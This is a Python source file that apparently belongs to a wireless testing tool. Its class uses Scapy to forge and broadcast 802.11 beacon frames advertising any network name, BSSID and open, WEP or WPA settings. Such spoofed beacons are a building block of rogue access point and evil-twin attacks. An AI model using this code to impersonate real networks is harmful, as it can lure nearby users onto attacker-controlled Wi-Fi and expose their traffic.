class SSIDBroadcaster(threading.Thread): """ This object is a thread-friendly SSID broadcaster It's meant to be controlled by the Wireless State Machine """ def __init__(self, interface, essid, bssid = None): threading.Thread.__init__(self) self.interface = interface self.essid = essid if not bssid: bssid = getHwAddr(interface) self.bssid = bssid.lower() self.broadcast_interval = 0.15 self.channel = "\x06" self.setPrivacy(PRIVACY_NONE) self.sequence = randint(1200, 2000) self.__shutdown__ = False def __unfuckupSC__(self, fragment = 0): """ This is a reserved method to return the sequence number in a way that is not f****d up by a bug in how the SC field is packed in Scapy. """ if self.sequence >= 0xFFF: self.sequence = 1 else: self.sequence += 1 SC = (self.sequence - ((self.sequence >> 4) << 4) << 12) + (fragment << 8) + (self.sequence >> 4) # bit shifts FTW! return unpack('<H', pack('>H', SC))[0] def run(self): """ This is the thread routine that broadcasts the SSID. """ while not self.__shutdown__: self.beacon.getlayer(Dot11).SC = self.__unfuckupSC__() sendp(self.beacon, iface=self.interface, verbose=False) sleep(self.broadcast_interval) def setPrivacy(self, value): """ Configure the privacy settings for None, WEP, and WPA """ if value == PRIVACY_NONE: self.beacon = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/Dot11Beacon(cap='ESS+short-preamble+short-slot')/Dot11Elt(ID="SSID",info=self.essid)/Dot11Elt(ID="Rates",info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/Dot11Elt(ID="DSset",info=self.channel)/Dot11Elt(ID=42, info="\x04")/Dot11Elt(ID=47, info="\x04")/Dot11Elt(ID=50, info="\x0c\x12\x18\x60") elif value == PRIVACY_WEP: self.beacon = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot')/Dot11Elt(ID="SSID",info=self.essid)/Dot11Elt(ID="Rates",info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/Dot11Elt(ID="DSset",info=self.channel)/Dot11Elt(ID=42, info="\x04")/Dot11Elt(ID=47, info="\x04")/Dot11Elt(ID=50, info="\x0c\x12\x18\x60") elif value == PRIVACY_WPA: self.beacon = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot')/Dot11Elt(ID="SSID",info=self.essid)/Dot11Elt(ID="Rates",info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/Dot11Elt(ID="DSset",info=self.channel)/Dot11Elt(ID=221, info="\x00\x50\xf2\x01\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x01")/Dot11Elt(ID=42, info="\x00")/Dot11Elt(ID=50, info="\x30\x48\x60\x6c")/Dot11Elt(ID=221, info="\x00\x50\xf2\x02\x01\x01\x84\x00\x03\xa4\x00\x00\x27\xa4\x00\x00\x42\x43\x5e\x00\x62\x32\x2f\x00") def sendBeacon(self): """ Convenience function for sending beacons without starting a thread """ self.beacon.getlayer(Dot11).SC = self.__unfuckupSC__() sendp(self.beacon, iface=self.interface, verbose=False) @staticmethod def sendBeaconEx(essid, interface, privacy = PRIVACY_NONE, bssid = None, channel = 6): """ Convenience function for sending beacons without a thread or creating an instance """ if not bssid: bssid = getHwAddr(interface) channel = chr(channel) sequence = randint(1200, 2000) if privacy in [PRIVACY_NONE, 'none', 'NONE']: beacon = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=bssid, addr3=bssid, SC=sequence)/Dot11Beacon(cap='ESS+short-preamble+short-slot')/Dot11Elt(ID="SSID",info=essid)/Dot11Elt(ID="Rates",info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/Dot11Elt(ID="DSset",info=channel)/Dot11Elt(ID=42, info="\x04")/Dot11Elt(ID=47, info="\x04")/Dot11Elt(ID=50, info="\x0c\x12\x18\x60") elif privacy in [PRIVACY_WEP, 'wep', 'WEP']: beacon = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=bssid, addr3=bssid, SC=sequence)/Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot')/Dot11Elt(ID="SSID",info=essid)/Dot11Elt(ID="Rates",info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/Dot11Elt(ID="DSset",info=channel)/Dot11Elt(ID=42, info="\x04")/Dot11Elt(ID=47, info="\x04")/Dot11Elt(ID=50, info="\x0c\x12\x18\x60") elif privacy in [PRIVACY_WPA, 'wpa', 'WPA']: beacon = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=bssid, addr3=bssid, SC=sequence)/Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot')/Dot11Elt(ID="SSID",info=essid)/Dot11Elt(ID="Rates",info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/Dot11Elt(ID="DSset",info=channel)/Dot11Elt(ID=221, info="\x00\x50\xf2\x01\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x01")/Dot11Elt(ID=42, info="\x00")/Dot11Elt(ID=50, info="\x30\x48\x60\x6c")/Dot11Elt(ID=221, info="\x00\x50\xf2\x02\x01\x01\x84\x00\x03\xa4\x00\x00\x27\xa4\x00\x00\x42\x43\x5e\x00\x62\x32\x2f\x00") else: raise Exception('Invalid privacy setting') sendp(beacon, iface=interface, verbose=False)